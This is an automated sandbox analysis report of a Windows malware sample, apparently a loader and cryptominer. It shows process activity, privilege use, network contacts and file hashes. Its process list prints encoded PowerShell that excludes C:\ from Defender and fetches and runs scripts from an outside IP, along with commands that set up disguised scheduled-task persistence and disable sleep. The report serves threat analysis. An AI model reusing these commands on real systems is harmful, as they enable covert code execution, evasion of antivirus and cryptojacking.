Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4408 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2400 wrote to memory of 4324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2400 wrote to memory of 4324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2252 wrote to memory of 488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 3008 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 3008 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2400 wrote to memory of 4684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2400 wrote to memory of 4684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2400 wrote to memory of 4684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2400 wrote to memory of 3656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2400 wrote to memory of 3656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2400 wrote to memory of 3656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3784 wrote to memory of 5012 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 5012 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 2084 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 2084 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 4568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 4568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3476 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3476 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3656 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3656 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3656 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3656 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3656 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3656 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 4904 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4904 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 03:46 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2A47.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 52.152.110.14:443 tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.43:80 pool.hashvault.pro tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 43.242.202.142.in-addr.arpa udp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_md0wiidr.m4m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 321756505d3ef828b22186c6b927a5fa
SHA1 d65a23744ec9ebb01baa142aa48a50c25e5e3a51
SHA256 990c202a39be4cceab0adb117dee8b9179ba607851616d49b653ea0daabc8fcc
SHA512 50fccf3a880c26aad38ebef396ab5550be96f0cd5ba602dbb7a017cd78c7fe3f21edb713638929b19f44e919f2879ab251825ad38682fd9a94053b944382bed2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
